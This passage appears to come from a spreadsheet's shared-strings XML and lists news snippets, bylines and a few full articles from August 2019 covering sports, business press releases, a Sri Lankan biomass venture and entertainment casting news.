    <t>What's it like? The new styling creates instant impression of extra presence – something the outgoing L200 lacked in comparison with...</t>
  </si>
  <si>
    <t>Kubota Tractor Corporation today announced the completion and grand opening of its two, one million square-foot, state-of-the-art logistics...</t>
  </si>
  <si>
    <t>Canterbury captain Josh Jackson says a defensive mindset shift is behind the Bulldogs' three straight NRL wins and promised fans more...</t>
  </si>
  <si>
    <t>Just this month, Mountain Hedgewitch LLC announced the immediate and necessary availability of its custom bath teas. Compared to other...</t>
  </si>
  <si>
    <t>JASON WILDE For the State Journal</t>
  </si>
  <si>
    <t>GREEN BAY — Matt LaFleur would like Aaron Rodgers to play in a preseason game before the Green Bay Packers open regular-season play next...</t>
  </si>
  <si>
    <t>HONG KONG, Aug. 26, 2019 (GLOBE NEWSWIRE) -- Futu Holdings Limited (“Futu” or the “Company”) (NASDAQ: FHL), a leading tech-driven online...</t>
  </si>
  <si>
    <t>India's water shortfall is disrupting business at all levels, from the gleaming, 45-kilometer (28-mile) IT Corridor to the neighborhood tea...</t>
  </si>
  <si>
    <t>Kaskela Law LLC announces that a shareholder class action lawsuit has been filed against Pivotal Software, Inc. (NYSE: PVTL) (“Pivotal” or...</t>
  </si>
  <si>
    <t>Honkamp Krueger Financial Services Inc. cut its holdings in shares of Black Hills Corp (NYSE:BKH) by 7.1% during the 2nd quarter, according...</t>
  </si>
  <si>
    <t>SINGAPORE, Aug. 13, 2019 /PRNewswire/ -- UMITRON PTE. LTD. (Singapore, Co-founder/ Managing Director Masahiko Yamada) launches Fish...</t>
  </si>
  <si>
    <t>Loading... Cork 3-16 – 1-14 Dublin Leaning towards the wall out of doors a bouncing Cork dressing-room, happiness and contentment...</t>
  </si>
  <si>
    <t>Dale Earnhardt Jr Dale Earnhardt Jr. and his family have been discharged from the hospital following Thursday's plane crash. The entire...</t>
  </si>
  <si>
    <t>Northumberland boy, 6, praised for his 'incredible' initiative in helping his unconscious dad | Northumberland Gazette</t>
  </si>
  <si>
    <t>Neil deMause</t>
  </si>
  <si>
    <t>When I relayed the news last week that Oklahoma City’s fourth iteration of its MAPS sales-tax hike was being eyed to fund upgrades to the...</t>
  </si>
  <si>
    <t>Rajat Sahni</t>
  </si>
  <si>
    <t>Global IoT in Oil and Gas Market Growth Status and Outlook 2019-2024 The Internet of Things (IoT) is a network of physical objects that use...</t>
  </si>
  <si>
    <t>talkSPORT.com brings you a round up of all the biggest news and gossip from the world of UFC… Khabib tells McGregor how to earn rematch...</t>
  </si>
  <si>
    <t>Paul Vegas</t>
  </si>
  <si>
    <t>Arsenal hero Emmanuel Petit remains unconvinced by manager Unai Emery. Their frailties were ­exposed as soon as they came up against a top...</t>
  </si>
  <si>
    <t>Upwork Inc (UPWK) shares might have a significant move ahead as the Mass Index volatility reading has dropped below 26.5. Mass Index rises...</t>
  </si>
  <si>
    <t>VANCOUVER, British Columbia and BONHAM, Texas, Aug. 14, 2019 (GLOBE NEWSWIRE) -- Kelso Technologies Inc. (“Kelso” or the “Company”),...</t>
  </si>
  <si>
    <t>Dublin, Aug. 30, 2019 (GLOBE NEWSWIRE) -- The "The Business Survey 2019: Mobile Satisfaction and Churn for Large Enterprises"...</t>
  </si>
  <si>
    <t>The driver of a motorcycle is dead following a crash in the Rimbey area early Sunday afternoon. RCMP, Rimbey Fire and EMS responded at about 12:40 p.m. to a location on Hwy 20 between township roads 422 and 424, which is just to the southeast of town. An adult male riding a motorcycle collided with a minivan travelling the opposite direction. The minivan had six occupants, all of whom were taken to local hospital as a precaution. He was pronounced dead on scene. STARS Air Ambulance was initially called in, but was eventually stood down. The cause of the collision remains under investigation.</t>
  </si>
  <si>
    <t>People are boycotting Equinox, SoulCycle and Blink Fitness for having an owner that supports President Trump.</t>
  </si>
  <si>
    <t>Houston Astros pitcher Justin Verlander works against the Oakland Athletics during the first inning of a baseball game Friday, Aug. 16,...</t>
  </si>
  <si>
    <t>Lauren</t>
  </si>
  <si>
    <t>River Lane has come a long way since becoming the first busker in the history of Mannum, in regional South Australia. A former tradie and...</t>
  </si>
  <si>
    <t>ST. LOUIS, Aug. 26, 2019 (GLOBE NEWSWIRE) -- Stifel Financial Corp. (NYSE: SF) today announced it has entered into a definitive agreement...</t>
  </si>
  <si>
    <t>Read it on Daily FT In creating Biomass Ventures, I have not been afraid to ‘think big’, because I have recognised that the opportunity for our business is massive and because I understand that the needs that we are addressing are monumental. In effect, we achieve ‘Sustainable and Ethical Fuel + Livelihood Development + Food’ in rural Sri Lanka, in a holistic, inclusive, financially-viable business model. We have created an innovative approach to sustainable biomass production, simultaneously mitigating climate change, enhancing food production, promoting soil conservation, and advancing economic, social and environmental well-being especially for smallholder farmers. In 2006, my London-based publishing house, Dakini Books, published ‘Global Warning – The Last Chance for Change’, Paul Brown's fact-based critically acclaimed book on climate change. Researching this book gave me phenomenal insight into the climate change consequences for our planet, and led me to think ‘Why not start a renewable energy business and, in the country of my birth – Sri Lanka?’ Between 2009 and 2011, my time was spent on R&amp;D. The agri-energy sector in Sri Lanka, although poorly organised, has immense potential. Biomass is already a widely-used energy source for household cooking in rural areas, for drying tea in tea factories and in garment boilers for producing steam and even electricity, but its sourcing is unsustainable in its present form. Outgrower schemes, although prevalent in the tea and coconut sectors, were non-existent in the biomass sector. Thus, our primary focus from the start has been on developing a robust and sustainable biomass supply chain to serve as the basis for a downstream expansion into value-added pellet manufacturing and sustainable biomass generated power. I also appreciated the compelling opportunity for biomass power to transform rural development in the country. My work during this time resulted in the establishment of Biomass Group (Biomass Ventures – Singapore Holding Company) – a vertically integrated, sustainable energy business that develops biomass resources to produce pellets and power. At its core, Biomass Ventures is a profitable, socially responsible business. Through Biomass Supplies, a wholly-owned subsidiary, we directly source biomass feedstock primarily from smallholder farmers but also from plantations, the Catholic Church, and Buddhist temples, etc. In the process, we generate millions of tons of commercial biomass – without owning a single parcel of land1. Our outgrower model is designed to deliver socio-economic impact for our supply partners, which in turn ensures our security of supply. Since start of business in March 2013, we have directly registered to our outgrower program more than 50,000, mainly smallholder farmers, who have collectively planted approximately 100 million Gliricidia trees. By partnering with other companies and institutions, we are on track to increase this number to 200,000 farmer suppliers by the end of 2020. As we scale our operations, we envisage registering 500,000 farmer suppliers across Sri Lanka – who will support planting 1 billion Gliricidia trees. We can sustainably deliver socio-economic impact at scale which will have a radically positive transformative impact on Sri Lanka’s energy and food nexus. The primary biomass crop used is ‘Gliricidia sepium’, a rapidly growing, short-rotation tree that is found growing wild throughout Sri Lanka. A native plant of Mexico and Central America, Gliricidia was introduced to Sri Lanka in the 18th century to provide shade to coffee plants, of which Sri Lanka was once the world’s largest producer, and is now pervasive across the country. Gliricidia is a nitrogen-fixing soil improver. In addition to its use as ‘live fencing’ by smallholders, its leaves and bark can be used as a highly effective, organic fertiliser and pesticide and it’s highly effective for intercropping as a shade tree. Our outgrower model is designed to deliver socio-economic impact for our supply partners, which in turn ensures our security of supply. Since start of business in March 2013, we have directly registered to our outgrower program more than 50,000, mainly smallholder farmers, who have collectively planted approximately 100 million Gliricidia trees. By partnering with other companies and institutions, we are on track to increase this number to 200,000 farmer suppliers by the end of 2020. As we scale our operations, we envisage registering 500,000 farmer suppliers across Sri Lanka – who will support planting 1 billion Gliricidia trees. We can sustainably deliver socio-economic impact at scale which will have a radically positive transformative impact on Sri Lanka’s energy and food nexus. Supplies maintain positive, long-term relationships with our farmer suppliers as they are the centre of our operations. Initially farmers were wary, but we have diligently worked to gain their trust over these last five years. We have organised over 700 training programs where we share knowledge on how Gliricidia can increase soil productivity, while reducing erosion and soil contamination associated with the use of chemical fertilisers. Our outgrower model enables farmers to reduce spending on agrichemicals, which improves environmental ecosystems by reducing chemical fertiliser and pesticide runoff. When the civil war ended in Sri Lanka in 2009, there was high unemployment especially amongst women who have few other economic opportunities. Today over 80% of our contact with our registered smallholder farmers is with the woman of the household. Any income they earn is a supplement to household income and is usually spent on family well-being and on children’s education. What we do, and the way we work, makes good business sense. Keeping our farmers engaged is a means to ensure the security of supply. Farmers will remain on their land instead of migrating to cities, and we achieve the security of supply necessary to enable the Pellet and Power segments of Biomass Group to become long-term stable revenue generating companies. In creating Biomass Ventures, I have not been afraid to ‘think big’, because I have recognised that the opportunity for our business is massive and because I understand that the needs that we are addressing are monumental. In effect, we achieve ‘Sustainable and Ethical Fuel + Livelihood Development + Food’ in rural Sri Lanka, in a holistic, inclusive, financially-viable business model. We have created an innovative approach to sustainable biomass production, simultaneously mitigating climate change, enhancing food production, promoting soil conservation, and advancing economic, social and environmental well-being especially for smallholder farmers. Contributing to achieve Sustainable Development Goals (SDGs) is at the core of our business. In 2017, we developed an impact monitoring and reporting framework based on SDGs. In the process, SDG1, SDG2, SDG5, SDG7 were identified and prioritised as achievable during the normal course of business activities (direct). Further, business model can facilitate to contribute to achieve SDG3, SDG4, SDG9, SDG10, SDG12, SDG15 and SDG17 with extra efforts made (indirect). Our journey to create an ethically-sourced sustainable supply chain for biomass was challenging but solid and self-evident. In 2015, Supplies achieved Roundtable on Sustainable Biomaterials (RSB) as the first company in South Asia. In 2012, we became a member of United Nations Global Compact and later pledged our support for global initiatives like Business Call to Action. In 2018, Supplies was selected as one of the first companies selected for Business Call to Action Impact Champions Programme. Recently, I won the Global Green Economic Forum (GGEF), Women Eco Game Changer Award, 2019. Having established a viable, secure Supply model during the past five years, we are now at the right stage to launch our downstream expansion into ‘Pellets and Power’. We provide a world-class demonstration of what can be achieved when we work toward a truly sustainable, inclusive business. My ambition is to transform the livelihoods of agricultural communities across Sri Lanka whilst building a successful, profitable business. 1 Smallholder farmers mostly plant Gliricidia as a live fence and plantations primarily intercrop Gliricidia for the leaves which are used as fertiliser. In neither case are food crops displaced.</t>
  </si>
  <si>
    <t>By Melody Vallieu mvallieu@aimmediadmidwest.com TROY — The space at 2 E. Main St. being transformed into the new Haren’s Market, caught...</t>
  </si>
  <si>
    <t>Metallica are reuniniting with the San Francisco Symphony for a two night experience at the Chase Center, S&amp;M2 on Friday, September 6th and...</t>
  </si>
  <si>
    <t>Predictive Oncology (NASDAQ: POAI) recently announced the receipt of its Skyline Medical division’s first order of STREAMWAY Systems from...</t>
  </si>
  <si>
    <t>MATT CARLSON Associated Press</t>
  </si>
  <si>
    <t>CHICAGO (AP) — Manager Joe Maddon says the Chicago Cubs have signed catcher Jonathan Lucroy. The 33-year-old Lucroy was designated for...</t>
  </si>
  <si>
    <t>Walmart de Mexico, Mexico's biggest retailer, said on Tuesday that sales at stores open for more than a year in Mexico rose by 2.2% in July...</t>
  </si>
  <si>
    <t>SEATTLE, Aug 14, 2019 /PRNewswire/ -- Today, Atomo Coffee Inc, announced it has secured $2.6 million in seed funding to develop the world's...</t>
  </si>
  <si>
    <t>Boris Johnson has refused to give an interview to Channel 4 at the G7 summit in Biarritz, days after he was criticised by the...</t>
  </si>
  <si>
    <t>Shane Olsen</t>
  </si>
  <si>
    <t>V.F. Corporation (VFC) will report its next earnings on Jul 24 BMO. The company reported the earnings of $0.3/Share in the last quarter...</t>
  </si>
  <si>
    <t>SAN DIEGO (AP) — Heron Therapeutics Inc. (HRTX) on Monday reported a loss of $50.2 million in its second quarter. On a per-share basis,...</t>
  </si>
  <si>
    <t>Amy Kuperinsky</t>
  </si>
  <si>
    <t>Two classic Charlie Brown films return to local theaters for the anniversary.</t>
  </si>
  <si>
    <t>By Michelle Ganley - Graham Media Group</t>
  </si>
  <si>
    <t>Are lash extensions safe? Definitely: Just make sure you're doing your homework</t>
  </si>
  <si>
    <t>PRESS RELEASE ACCESSWIRE</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / August 21, 2019 / Precipio, Inc. (NASDAQ:PRPO) will be discussing their earnings results in their 2019 Second...</t>
  </si>
  <si>
    <t>LOS ANGELES, Aug. 24, 2019 /PRNewswire/ -- Cheapquotesautoinsurance.com has launched a new blog post that presents several common traffic...</t>
  </si>
  <si>
    <t>The Indiana Gazette</t>
  </si>
  <si>
    <t>HOMER CITY — A Homer City woman has waived a preliminary hearing on drug-related charges stemming from a July 2 White Township case, while...</t>
  </si>
  <si>
    <t>eSports involves gamers playing competitively against another individual or team, online. They are not limited to a select few games or...</t>
  </si>
  <si>
    <t>Tickers: XTSX:LTX Tags: #Oil&amp;Gas, #Technology, #Media Calgary, Alberta - TheNewswire - August 21, 2019 - Labrador Technologies Inc....</t>
  </si>
  <si>
    <t>Chris Larson</t>
  </si>
  <si>
    <t>10:25 P.M. UPDATE: We now know more about the disturbance reported this afternoon at the Walmart in Dilworth. Dilworth Police Chief Ty...</t>
  </si>
  <si>
    <t>Protesters once again took to the streets of Moscow Saturday, decrying the exclusion of some independent and opposition candidates for...</t>
  </si>
  <si>
    <t>SOURCE: Arrow Electronics DESCRIPTION: DENVER, Augst 21, 2019 /3BL Media/– Arrow Electronics hosted a Family Day at its Hong Kong...</t>
  </si>
  <si>
    <t>NORTH LIBERTY, Iowa, Aug. 26, 2019 (GLOBE NEWSWIRE) -- Heartland Express, Inc. (NASDAQ: HTLD) (“Heartland”), one of North America’s...</t>
  </si>
  <si>
    <t>ORCHARD PARK, N.Y. (AP) - The Buffalo Bills have signed kicker Stephen Hauschka to a two-year contract extension. Hauschka was entering...</t>
  </si>
  <si>
    <t>Global Supply Chain Planning Software Market Research Report includes holistic enterprise counsel and changing developments in the market...</t>
  </si>
  <si>
    <t>Philip Case</t>
  </si>
  <si>
    <t>Skee-Tex has unveiled a new lightweight welly boot with extra insulation for plodding around farm yards in the winter. Its Ultralight Tuff...</t>
  </si>
  <si>
    <t>Europe Medical Plastic Market is expected to reach USD 4.84 billion by 2024. Plastic is termed as a material, which is a part of synthetic...</t>
  </si>
  <si>
    <t>(Reuters) - Clothing and furnishing retailer Laura Ashley (L:ALY) swung to an almost 10 million pound pretax loss for the full year ending...</t>
  </si>
  <si>
    <t>The "The African Data Center Boom: Cloud, Hyperscale, and the Transformation of African Colocation Markets - Standard Report" report has...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- Quanta Services, Inc. (NYSE: PWR) announced today that its Board of Directors has declared a quarterly cash dividend to stockholders of $0.04 per share. The dividend is payable October 15, 2019, to stockholders of record on October 1, 2019. About Quanta Services Quanta Services is a leading specialized contracting services company, delivering comprehensive infrastructure solutions for the electric power, energy and communications industries, including design, installation, repair and maintenance. With operations throughout the United States, Canada, Latin America, Australia and select other international markets, Quanta has the manpower, resources and expertise to safely complete projects that are local, regional, national or international in scope. For more information, visit www.quantaservices.com. Forward Looking Statements This press release (and any oral statements regarding the subject matter of this press release) contains forward-looking statements intended to qualify for the "safe harbor" from liability established by the Private Securities Litigation Reform Act of 1995. Forward-looking statements include, but are not limited to, statements relating to Quanta's expectations regarding the declaration, amount or timing of any future dividends, as well as statements reflecting expectations, intentions, assumptions or beliefs about future events and other statements that do not relate strictly to historical or current facts. Although Quanta's management believes that the expectations reflected in such forward-looking statements are reasonable, it can give no assurance that such expectations will prove to be correct. These statements can be affected by inaccurate assumptions and by a variety of risks and uncertainties that are difficult to predict or beyond our control, including, among others, variations in Quanta's financial condition, results of operations, profitability, cash flows and liquidity; current and expected capital requirements and reinvestment opportunities; requirements relating to dividends under Delaware law and the credit agreement for Quanta's senior secured credit facility; the impact of income tax laws; market conditions; the effects of industry, economic or political conditions outside of the control of Quanta; and other risks and uncertainties detailed in Quanta's Annual Report on Form 10-K for the year ended Dec. 31, 2018, Quanta's Quarterly Reports on Form 10-Q for the quarters ended Mar. 31, 2019 and June 30, 2019 and any other documents that Quanta files with the Securities and Exchange Commission (SEC). For a discussion of these risks, uncertainties and assumptions, investors are urged to refer to Quanta's documents filed with the SEC that are available through the company's website at www.quantaservices.com or through the SEC's Electronic Data Gathering and Analysis Retrieval System (EDGAR) at www.sec.gov. Should one or more of these risks materialize, or should underlying assumptions prove incorrect, actual results may vary materially from those expressed or implied in any forward-looking statements. Investors are cautioned not to place undue reliance on these forward-looking statements, which are current only as of this date. Quanta does not undertake and expressly disclaims any obligation to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise. Quanta further expressly disclaims any written or oral statements made by any third party regarding the subject matter of this press release. Investors - Kip Rupp, CFA Media ? Lynn Hancock Quanta Services, Inc. Ward (713) 341-7260 (713) 869-0707</t>
  </si>
  <si>
    <t>Loading... Getting lower from his junior top baseball workforce looked like the worst day of John Falcone’s existence some 40 years in the...</t>
  </si>
  <si>
    <t>The AP’s six-year veteran White House reporter Darlene Superville has triggered a backlash in Africa and drawn the ire of many on Twitter...</t>
  </si>
  <si>
    <t>Debra Wallace</t>
  </si>
  <si>
    <t>Regardless of the genre, Martin Freeman is looking for “the human factor” in the diverse television series and films he puts his heart and...</t>
  </si>
  <si>
    <t>Dana Parsons</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.24 in Q1 2019. Its up 0.20, from 1.04 in 2018Q4. It improved, as 44 investors sold OKE shares while 205...</t>
  </si>
  <si>
    <t>Breaking into the Premier League's top six has been a tough task for the teams outside the elite group but ...</t>
  </si>
  <si>
    <t>Rob Vanstone, Regina Leader-Post</t>
  </si>
  <si>
    <t>The Saskatoon Hilltops’ Tom Sargeant recorded his 200th victory as a junior football head coach Sunday against the host Regina Thunder.</t>
  </si>
  <si>
    <t>The stock of Siteone Landscape Supply Inc (NYSE:SITE) registered a decrease of 0.32% in short interest. SITE’s total short interest was...</t>
  </si>
  <si>
    <t>REDWOOD CITY, Calif., Aug. 8, 2019 /PRNewswire-PRWeb/ -- Cyara announced that TMC, a global integrated media company, has awarded the Cyara...</t>
  </si>
  <si>
    <t>HENDERSON, Nev., Aug. 21, 2019 /PRNewswire-PRWeb/ -- Anti-Rheumatoid Arthritis (RA) Action of Biofield Energy Treatment Using Synovial...</t>
  </si>
  <si>
    <t>Lawyers can sometimes be mundane in their construction of contracts, the the point where their scrutiny can appear pointless. Beyond just...</t>
  </si>
  <si>
    <t>On August 19 2017 (International Orangutan Day), POFCAP launched the world’s first Palm Oil Free Certification Trademark in Australia. Now,...</t>
  </si>
  <si>
    <t>Daneel (CURRENCY:DAN) traded 3.4% lower against the dollar during the twenty-four hour period ending at 16:00 PM Eastern on August 8th....</t>
  </si>
  <si>
    <t>By JIM MUSTIAN and MICHAEL R. SISAK Associated Press</t>
  </si>
  <si>
    <t>NEW YORK (AP) — In the wake of Jeffrey Epstein's suicide, federal prosecutors in New York have shifted their focus to possible charges...</t>
  </si>
  <si>
    <t>BEIJING, Aug. 17, 2019 /PRNewswire/ -- According to the 2019 Semi-annual Report issued by China Fortune Land Development (CFLD) on August...</t>
  </si>
  <si>
    <t>YOUTH REVOLT: Nearly Half of College Students Want ‘In God We Trust’ Removed from Currency According to a recent online survey...</t>
  </si>
  <si>
    <t>WALTHAM, Mass., Aug. 05, 2019 (GLOBE NEWSWIRE) -- Entasis Therapeutics Holdings Inc. (NASDAQ: ETTX), a clinical-stage biopharmaceutical...</t>
  </si>
  <si>
    <t>Check out the best sights and sounds from the Giants comeback win over the Patriots.</t>
  </si>
  <si>
    <t>By RYAN J. FOLEY Associated Press</t>
  </si>
  <si>
    <t>IOWA CITY, Iowa (AP) — David Hawkins is the kind of client that Iowa public defender Michael Adams would typically be appointed to...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 02, 2019 (GLOBE NEWSWIRE) -- Attorney Advertising -- Bronstein, Gewirtz &amp; Grossman, LLC reminds investors that a class...</t>
  </si>
  <si>
    <t>Francis Xavier;Francis Xavier</t>
  </si>
  <si>
    <t>If you are at the intersection of being a Coloradian and arachnophobic you may want to steer clear of Comanche National Grassland south of...</t>
  </si>
  <si>
    <t>On Wednesday the shares-rate of the Company Altra Indtl Mtn, AIMC Stock exchange NASDAQ, is an exciting player in the Industrial Products....</t>
  </si>
  <si>
    <t>Motley Fool Transcription, Motley Fool</t>
  </si>
  <si>
    <t>Image source: The Motley Fool. Atlantic Power Corporation (NYSE: AT) Q2 2019 Earnings Call Aug. 2, 2019, 8:30 a.m. ET...</t>
  </si>
  <si>
    <t>Aidan Wallace</t>
  </si>
  <si>
    <t>Anti-vaxer’s have espoused for many years the autism ‘epidemic’ is a consequence of vaccines. However, a new study published in JAMA...</t>
  </si>
  <si>
    <t>If you put a premium on peace and quiet in your golden years and are willing to pay for the privilege, consider retiring in one of these...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 09, 2019 (GLOBE NEWSWIRE) -- Reverie: Page is a newly-established fashion publication dedicated to the development and...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 8, 2019 /PRNewswire/ -- Semsee, an insurtech company focused on streamlining workflows for independent insurance agents and...</t>
  </si>
  <si>
    <t>WASHINGTON — President Donald Trump says South Korea has agreed to pay the United States "substantially more" for protection against North...</t>
  </si>
  <si>
    <t>Anita Bennett</t>
  </si>
  <si>
    <t>Click here to read the full article. Fox News personalities Raymond Arroyo and Jason Chaffetz are perplexed as to why Bernie Sanders would sit down to talk politics with Cardi B. The Democratic presidential candidate and the Grammy-winning rapper discussed the 2020 election last month at a Detroit nail salon. The video, released this week by the Sanders’ campaign, showed Cardi B interviewing the White House hopeful about wages, jobs, immigration, racism, police brutality, and other issues. More from Deadline Fox News, NBC Ramp Up Coverage In Wake Of El Paso Shooting Trump Boasts "I Made A Lot Of Money For NBC With 'The Apprentice'" As He Rips NBC, CNN, Fox News Cardi B Concert Suddenly Canceled Over "Threat" Against The Rapper [Watch the Sanders interview below] Fox News contributor Arroyo dissected the interview last night in the “Friday Follies” segment of The Ingraham Angle. “This has to be the weirdest pairing of the week,” he said. Former Utah Congressman Jason Chaffetz, who was sitting in for host Laura Ingraham laughed, and referred to the rapper as “Sanders’ latest campaign sidekick.” The pair tossed to a social media video in which the Bronx rapper, real name Belcalis Marlenis Almánzar, asked what the government was doing with her “f**king tax money.” “If she’s worried about tax dollars being spent, why is she supporting Bernie Sanders?” Arroyo asked. “His health care plan promises $32 trillion in new taxes, and that’s before you pay for the free tuition, the DACA expansion for the parents.” VIDEO: Bernie Sanders visits a nail salon and talks issues with Cardi B, America's dirty underwear secret, and why is @jasoninthehouse Chaffetz so excited about Pumpkin Spice Spam? A rollicking #FridayFollies @IngrahamAngle @Foxnews. https://t.co/taCiT35Ct6 — Raymond Arroyo (@RaymondArroyo) August 17, 2019 Arroyo then brought up Cardi B’s past endeavors (before she became a reality star, and later a chart-topping rapper, she worked as a stripper). After playing a clip of Cardi B talking about stripping, Arroyo bashed the 26-year-old performer and the 77-year-old politician. “I think Bernie has the stripper vote locked down,” he quipped. “So, he’s gonna move up on those polls, those are a certain type of poll, I guess.” He then compared Sanders’ interview with the “Money” rapper, to Jay Z’s new partnership with the NFL. “It reminds me, Jason, of the NFL this week. They recruited Jay-Z to buy cred [credibility] in the African-American community. That’s really what Bernie is trying to do here. They need African-American support in the Democratic caucus, and that’s what this is a stretch toward.” Chaffetz ended the discussion by saying he doesn’t understand Cardi B’s popularity. “People actually pay her money. That’s what’s really stunning to me,” he said. Arroyo added, “I know. It’s absolutely unbelievable.” Sign up for Deadline's Newsletter. For the latest news, follow us on Facebook, Twitter, and Instagram.</t>
  </si>
  <si>
    <t>SOUTH WILLIAMSPORT, LYCOMING COUNTY (WBRE/WYOU) — Thursday’s rainy forecast pushed three of the four Opening Day games at the Little League...</t>
  </si>
  <si>
    <t>Several former Danish diplomats slammed President TrumpDonald John TrumpFacebook releases audit on conservative bias claims Harry Reid:...</t>
  </si>
  <si>
    <t>David Bowie's ex-wife Angie was drugged and raped at the age of 24. The model, who is now 69, has revealed that the life-changing moment...</t>
  </si>
  <si>
    <t>Michael Ramsey</t>
  </si>
  <si>
    <t>AFL legend and two-time Adelaide premiership coach Malcolm Blight says the powerhouse club is at its lowest ebb. Blight's scathing attack...</t>
  </si>
  <si>
    <t>GCL Pirates beats GCL Braves 5-3 behind Pie's single</t>
  </si>
  <si>
    <t>Chicago, IL, August 12, 2019 --(PR.com)-- Popular Book Company (USA) Ltd. (“Popular USA”) is pleased to announce the launch of our products...</t>
  </si>
  <si>
    <t>First Trust Advisors LP lowered its holdings in shares of Delek US Holdings Inc (NYSE:DK) by 2.4% during the second quarter, according to...</t>
  </si>
  <si>
    <t>CORPUS CHRISTI, Texas (AP) -- Forrest Whitley hurled 5 1/3 scoreless innings, leading the Corpus Christi Hooks over the Arkansas Travelers...</t>
  </si>
  <si>
    <t>DEKALB COUNTY, Ga. (WSB/CNN) - Fifteen-year-old Malachi McFadden is recovering days after being severely burned in a school lab experiment....</t>
  </si>
  <si>
    <t>Jeff Wilder</t>
  </si>
  <si>
    <t>SounDAC (CURRENCY:XSD) traded 57.6% higher against the US dollar during the one day period ending at 19:00 PM E.T. on August 26th. One...</t>
  </si>
  <si>
    <t>VIVUS receives $2.5 million milestone payment CAMPBELL, Calif., Aug. 05, 2019 (GLOBE NEWSWIRE) -- VIVUS, Inc. (Nasdaq:VVUS) (the...</t>
  </si>
  <si>
    <t>The "LonWorks Building Management System - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>The yield on the closely watched 10-year Treasury fell so low Wednesday that, for the first time since 2007, it briefly crossed a threshold...</t>
  </si>
  <si>
    <t>Value Line, Inc. (NASDAQ:VALU) was the recipient of a large decrease in short interest during the month of August. As of August 15th, there...</t>
  </si>
  <si>
    <t>See photos images Skip to next photo 1/1 Show caption 1/1 0 comment In the face of strong winds and many events having to cancel,...</t>
  </si>
  <si>
    <t>A new poll has found a majority of Scots are now in favour of independence which Scotland’s First Minister described as phenomenal.</t>
  </si>
  <si>
    <t>Earlier in the year, it was announced that cult classic XIII would be getting a remake for modern systems. Since that announcement it’s...</t>
  </si>
  <si>
    <t>Domino's Pizza is taking a page from from its third-party delivery foes and delivering its pizza with electric bikes.</t>
  </si>
  <si>
    <t>DIANE JEANTET Associated Press</t>
  </si>
  <si>
    <t>RIO DE JANEIRO (AP) — Brazil's official monitoring agency is reporting a sharp increase in wildfires this year, and President Jair...</t>
  </si>
  <si>
    <t>CARLSBAD, CA / ACCESSWIRE / August 29, 2019 / Patriot Scientific Corporation (OTC PINK:PTSC) today announced it has filed its Report on...</t>
  </si>
  <si>
    <t>The "qPCR Reagents - Market Analysis, Trends, and Forecasts" report has been added to ResearchAndMarkets.com's offering. qPCR Reagents...</t>
  </si>
  <si>
    <t>PEARL RIVER, N.Y., Aug. 07, 2019 (GLOBE NEWSWIRE) -- Hudson Technologies, Inc. (NASDAQ: HDSN) will host a conference call and webcast on...</t>
  </si>
  <si>
    <t>Agencies</t>
  </si>
  <si>
    <t>German Chancellor Angela Merkel has told British Prime Minister Boris Johnson the EU would be prepared for a no-deal Brexit, as she...</t>
  </si>
  <si>
    <t>BISMARCK, N.D. (AP) — If former U.S. Sen. Heidi Heitkamp tries to resurrect her political career, she says it won't be through a run for...</t>
  </si>
  <si>
    <t>Anthony D'Alessandro</t>
  </si>
  <si>
    <t>Click here to read the full article. The Haunting of Bly Manor creator Mike Flanagan made it official on Twitter this morning that iZombie actor Rahul Kohli is joining the Netflix/Paramount TV/Amblin/Intrepid Pictures follow-up horror anthology series to The Haunting of Hill House. In addition, Catherine Parker, who starred in Hill House as Poppy Hill, is coming to Bly Manor. More from Deadline 'Marriage Story': Scarlett Johansson, Adam Driver, Laura Dern &amp; Noah Baumbach On Divorce Drama - Venice Netflix Searches For 'Love &amp; Anarchy', Swedish Drama From 'Euphoria' Filmmaker Lisa Langseth &amp; FLX 'Marriage Story' Was Personal For Noah Baumbach &amp; Tells A More "Expansive" Tale Of The Pain Of Divorce -- Venice Flanagan also announced that T’Nia Miller and Amelia Eve are joining as well as Amelie Smith (Role of “Flora”) and Benjamin Ainsworth (Role of “Miles”), the latter two being kids’ roles. Kohli, in a series regular role, is reportedly playing a small town guy with a worldly mindset, who has returned to the country to take care of his ailing mother. Bly Manor is inspired by Henry James’ psychological gothic horror novella The Turn of the Screw, which takes place almost entirely in an old country mansion. There, two young orphans are looked after by a young governess by whom most of the story is narrated by. As Deadline exclusively announced, Victoria Pedretti plays the governess. On Wednesday, Flanagan revealed that Hill Houses thespian Henry Thomas was coming back for Bly Manor, and yesterday he announced that the series’ Kate Siegel was coming back too. Originally from London, England, Rahul began his career by performing in local theater. In early 2014, Rahul self-taped for the CW pilot, iZombie, which was created by Rob Thomas . Several days later, they offered the role to Kohli as Rob Thomas knew he was his guy after viewing his audition. Earlier this year, Kohli wrapped the fifth and final season of iZombie. Previously, Kohli starred in the feature Netflix film, Happy Anniversary, opposite Ben Schwartz and Noel Wells. The film is about a couple (Ben and Noel) at a crossroads in their relationship and Kohli plays Schwartz’s best friend. Kohli is represented by Artists First and United Agents in the UK. Parker’s Poppy Hill in Hill House was a 1920s-era ghost who married into the Hill family. She met her husband, William Hill, in the asylum where they were both patients and took up residence in Hill House shortly after. As a ghost, Poppy believes the only way to wake them up humans from their nightmares is to kill them. Parker is repped by Luber Roklin and VanderKloot Law. Trevor Macy is EP on Bly Manor under the Intrepid Pictures banner with Flanagan. Amblin TV and Paramount TV are also behind Bly Manor. It is slated to debut in 2020. Intrepid Pictures also has Warner Bros.’ The Shining sequel Doctor Sleep on Nov. 8, which Flanagan directed, as well as Midnight Mass, a second horror series that will be coming to Netflix. Below are Flanagan’s tweets: If you’re a fan of SUPERGIRL or iZOMBIE, get ready for the remarkably charming RAHUL KOHLI, one of new leads. @RahulKohli13 — Mike Flanagan (@flanaganfilm) August 30, 2019 Almost a decade ago, I first worked with CATHERINE PARKER on a tiny movie called ABSENTIA. Last season, she was unforgettable as Poppy Hill… today, I’m thrilled to announce that she’s joining us at Bly Manor. — Mike Flanagan (@flanaganfilm) August 30, 2019 If you’ve been watching YEARS AND YEARS, you’ll recognize the amazing T’NIA MILLER, who has joined Bly Manor in a lead role. @TNiaMiller — Mike Flanagan (@flanaganfilm) August 30, 2019 Sign up for Deadline's 